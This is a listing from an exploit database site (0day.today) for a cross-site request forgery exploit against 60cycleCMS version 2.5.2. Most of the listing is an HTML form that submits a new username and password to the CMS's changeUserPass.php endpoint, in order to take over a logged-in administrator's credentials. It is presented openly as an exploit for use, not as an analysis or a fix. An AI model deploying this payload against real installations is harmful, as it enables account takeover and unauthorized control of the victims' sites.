[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

60cycleCMS V 2.5.2 CSRF Change Username & Password Exploit

Author
El-Kahina
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11842
Category
web applications
Date add
16-04-2010
Platform
php
==========================================================
60cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
==========================================================

========================================================================================                 
| # Title    : 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
| # Author   : EL-KAHINA                                                                                                                
| # Home     : www.iqs3cur1ty.com/vb    
| # Web Site : http://php.opensourcecms.com/scripts/details.php?scriptid=337                                                                           
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : CSRF                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  :
  
<html>
<body>
<h2>Change Username or Password</h2>
<p>Enter desired username and password.</p>
<form action="http://127.0.0.1/60cycleCMS.2.5.2/private/changeUserPass.php" method="post" name="changeUserPass">
Desired Username: <input name="user" type="text" /><br />
Desired Password: <input name="pass" type="password"/><br />
Confirm Desired Password: <input name="passConfirm" type="password"/><br />
<input type="button" value="Submit" onclick="checkForm(this.form)" />
</form>
</body>
</html>



#  0day.today [2024-11-15]  #